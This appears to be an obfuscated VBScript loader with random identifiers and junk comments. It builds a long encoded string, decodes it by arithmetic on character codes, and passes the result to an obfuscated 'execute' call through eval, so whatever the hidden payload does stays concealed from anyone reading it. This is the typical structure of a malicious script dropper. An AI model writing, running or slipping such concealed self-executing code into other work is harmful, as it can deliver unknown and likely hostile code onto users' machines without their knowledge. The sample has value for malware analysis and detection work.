dsqd420 = "DHQHVIAEXIKFPFYIKFPGCFRFOFYIKFPGCIKFPFJFRFTFYHQHVIAEXIKFQFYIKFQGCFWFVFYIKFQGCIKFQFJFVFYHQHV"
dsqd420=dsqd420&"IAEXIKFRFYIKFRGCFQFOFYIKFRGCIKFRFJFTFYHSIIIBHPIHHVICIBEXHPHUIDIDHRHQFGHOIKHQIBIFIIFHFYIAIIIEHUHOHVHSGCIKFQ"
'jcnvetbk
'oqcmahoibw
'hmuk
dsqd420=dsqd420&"FYIKHWHVIBIBIAIFHRHYGCHNIGHPFGGSHVHQFGHOIKHQIBIFIIFKFPFKFPFHFHFLIKFPFYHOIKHQIBIFIIGCGSHVHQFGH"
'cjdwkkxhyim
'wqxa
dsqd420=dsqd420&"OIKHQIBIFIIFKFQFKGRHRIBFGHOIKHQIBIFIIFHFLFPFHFYIEHTIGHRIMGCFAFAFYIKHUHVHYHRFGGRHRIBFGHOIKHQIBIFIIFHGDFOFH"
dsqd420=dsqd420&"IEHTIGHRIMGCIEHTIGHRIMFEFGGIHUIFFGFGFGFGHNIGHPFGGSHVHQFGHOIKHQIBIFIIFKFPFKFPFHFHFLIKFPFHFHFII"
'ptkslcvx
'roxsh
'oohqbfk
dsqd420=dsqd420&"KFRFJFGHNIGHPFGGSHVHQFGHOIKHQIBIFIIFKFQFKFPFHFHFLIKFPFHFLIKHWHVIBIBIAIFHRHYFLIAIIIEHUHOHVHSFHFHFHFYHO"
dsqd420=dsqd420&"IKHQIBIFIIGCGSHVHQFGHOIKHQIBIFIIFKFRFKGRHRIBFGHOIKHQIBIFIIFHFLFQFHFYIKGKIBHQFYHPHUIDIDHRHQGCIEHTIGHRIMFYH"
'licse
dsqd420=dsqd420&"RIBHQEXHSIIIBHPIHHVICIBFYHQHVIAEXIKHXFPFYIKHXFPGCFAGNGOGJGOGYGOGRGOGGGOGXGOGMGOGSGOGRGLGOGOGUGMGGGLGWGOGUG"
dsqd420=dsqd420&"MGIGLGXGMGPGOGUGMGHGMGSGNHEGOGWGOGGGLGWGNGJGOGMGOGHGLGWGOGUGMGIGLHBGMGGGLHBGMGGGLGXGLGXGLHCGMGLGMGKGMGPGOGUG"
'smgohlndur
'trsicgrgttqd
dsqd420=dsqd420&"MGIGMGSGNGJGOGMGOGHGLGWGOGUGMGIGLHBGMGHGLHBGNGIGOGIGOGRGLGWGOGUGMGIGLGXGLHCGMGGGLGXGMGPGOGUGMGJGMGSGLGQGLG"
dsqd420=dsqd420&"QGLGQGLGQGMGPGOHBGOGLGOGMGOGPGOGIGLGWGNGIGOGIGOGRGLGWGOGUGMGIGLGXGMGTGMGIGLGXGOGUGMGJGMGSGOGUGMGJGLGUGL"
dsqd420=dsqd420&"GWGMGYGOGLGOGVGLGWGLGWGLGWGLGWGNHEGOGWGOGGGLGWGNGJGOGMGOGHGLGWGOGUGMGIGLHBGMGGGLHBGMGGGLGXGLGXGLHCGMGLGM"
'wvmsiouyigvp
'ossv
dsqd420=dsqd420&"GKGLGXGLGXGLGYGMGHGMGKGLHAGLGWGNHEGOGWGOGGGLGWGNGJGOGMGOGHGLGWGOGUGMGIGLHBGMGHGLHBGMGGGLGXG"
dsqd420=dsqd420&"LGXGLHCGMGLGMGKGLGXGLHCGOGUGMGHGLHCGMGOGMGJGLGXGLGXGLGXGMGPGOGUGMGIGMGSGNGJGOGMGOGHGLGWGOGUGMGIGLHBGM"
dsqd420=dsqd420&"GIGLHBGNGIGOGIGOGRGLGWGOGUGMGIGLGXGLHCGMGHGLGXGMGPGOHBGMHBGOGRGOGHGMGPGOGUGMGGGMGSGOGUGMGJGMGPGOG"
'kqcbyxknmk
'scdlb
dsqd420=dsqd420&"IGOGRGOGHGLGOGOGJGOGYGOGRGOGGGOGXGOGMGOGSGOGRGMGPGOGWGOGIGOGXGLGOGOGSGMHEGMGSGLGOGMGYGOGVGOGIGNHEGOGXGOGIGNGL"
dsqd420=dsqd420&"GNHFGOGNGOGIGOGGGOGXGLGWGLGQGLGQGNGJGOGMGOGGGOGVGOGSGOGWGOGSGOGJGOGXGLHDGNGUGNGJGNGIGMHEGNGQGNGQGNGMGLGQGLGQG"
'mihdp
'lefvkfdu
'cmwigjr
dsqd420=dsqd420&"LGXGMGPGOGSGMHEGLHDGOGSGOGTGOGIGOGRGLGOGLGQGLGQGOGTGOGSGOGWGOGXGLGQGLGQGLHBGLGOGLGQGLGQGOGLGOGX"
dsqd420=dsqd420&"GOGXGOGTGMGPGLHEGLHEGOGPGOGSGNHEGOGHGOGXGOGGGOGSGOGRGOGXGNHEGOGHGOGSGOGVGLHCGOGGGOGSGOGQGLHCGNHF"
dsqd420=dsqd420&"GOGVGLHDGOGYGOGQGNHFGOGPGOGIGOGVGLHDGOGRGOGIGOGXGLHEGNHEGOGXGMGHGMGGGLHDGOGTGOGLGOGTGLGQGLGQGLGOGLHBGLGOGLH"
'tcpbb
'isvbsck
'ctrnvhkcvsp
dsqd420=dsqd420&"FGMGPGOGSGMHEGLHDGOGWGOGIGOGXGNGOGOGIGOGUGOGYGOGIGOGWGOGXGMHEGOGIGNHEGOGHGOGIGOGVGLGOGLGQGLGQGMG"
'krebvxquyk
'kuysjia
dsqd420=dsqd420&"YGOGSGOGRGOGXGOGIGOGRGOGXGLHCGNGQGOHDGOGTGOGIGLGQGLGQGLHBGLGOGLGQGLGQGNHEGOGTGOGTGOGPGOGMGOGGG"
dsqd420=dsqd420&"NHEGOGXGOGMGOGSGOGRGLHEGOHCGLHCGOHBGOHBGOHBGLHCGOGJGOGSGOGVGOGQGLHCGOGYGOGVGOGPGOGIGOGRGOGGGOGSGOGHGOGIGOGHG"
dsqd420=dsqd420&"LGQGLGQGMGPGOGSGMHEGLHDGOGWGOGIGOGRGOGHGLGOGLGQGLGQGOGUGMGSGMGGGLGQGLGQGMGPGOHCGMGKGMGSGOGSGM"
dsqd420=dsqd420&"HEGLHDGOGVGOGIGOGWGOGTGOGSGOGRGOGWGOGIGNGQGOGIGOHCGOGXGMGPGOGIGOHCGOGIGOGGGOGYGOGXGOGIGLGWGOGUGMGGGLGWGOHCG"
'iklhvqvlynum
'hnelg
dsqd420=dsqd420&"MGKGLGXGLGXFAFYIKHXFQGCHPHUIDIDHRHQFGIKHXFPFHFYHRIJHNHYFAEXEXEXEXEXHRILHRHPFAEXFEEXEXEXFAIIFAFEFAIHFAFE"
dsqd420=dsqd420&"FAHREXEXEXEXFGFAFEHPHUIFFGFRFSFHFEEXIKHXFQEXFEHPHUIFFGFRFSFHFEFAFHFA"

'xuytioduntlhqsipxrsmcebhphygsohnjwwevckqsiogaulsmyqum
okujixlevhe296=88:
qovgosx994 = 65
otqkvvniioiia177=asc(_
Mid(dsqd420,1,1))-qovgosx994
'ehfrpdltbovtcsibjbevtgernflswqwyqppxy
'aduwwdglvumywnsegtfuocpaubclclnrrglbhtiabjqsj
mcpvxadg7 = 2
qbklh359 = 1
dsqd420=Mid(_
dsqd420,mcpvxadg7,Len(_
dsqd420)-qbklh359)
cdcaiasyffrj859=""
'yophrostxtakmeiyybxjsfaxgvwpelwfiuwdbxeduvnumlpruqcdjuvqt
'vkoxdcwlfbdtne
ramybikbvxhp621 = 0
while(_
Len(_
dsqd420)>ramybikbvxhp621)
cdcaiasyffrj859=cdcaiasyffrj859&(_
Chr((((asc(_
Mid(dsqd420,qbklh359,qbklh359))-qovgosx994))_
*25+(asc(Mid(dsqd420,mcpvxadg7,qbklh359))_
-qovgosx994)-otqkvvniioiia177-okujixlevhe296)))
'lsdugyiwtsydkfoolyaoyyr
'sysftwqfuplumtofvqauffrssmlknlvpyvjkrwicuofpnde
dsqd420=Mid(dsqd420,3,Len(dsqd420)_
-mcpvxadg7)
'kgtaoglufmbtwmcpmebmkkbduontqyfnsxonhaitcsedkjiqaqvmqc
'uneebqdvoqfmglhohyjtfwnpcyegxajgrtdikyyvupgrog
wEnd
dim hjkdlgxysxi618
qovgosx994 = 30
mcpvxadg7 = 4
qbklh359 = qovgosx994 +  mcpvxadg7
ramybikbvxhp621 = qbklh359 + 1
'owccsceafemvdwialxeheyhdmdardijuokodckgpawocqa
'rkqbmkxdmmxcqoiucliax
hjkdlgxysxi618 = replace(cdcaiasyffrj859,chr(qbklh359),chr(qbklh359)&chr(qbklh359))
'dedqgjlvoejrpclsk
'gqhifikmqplnvydaorbgldqnxyslunfrtfuiwexplqdgrxnoufhyuifjnvqj
qovgosx994 = replace(" # ##   # #  ## ## ##   ##  ##  ##e##x"  &   "e##c##u##t#e ## # ## ##("&chr(qbklh359)& hjkdlgxysxi618 &chr(qbklh359)&")",chr(ramybikbvxhp621),"")
eval qovgosx994
'ovmoohnlpqbgquvgqishauupmxqdswlqpteogkgkghms
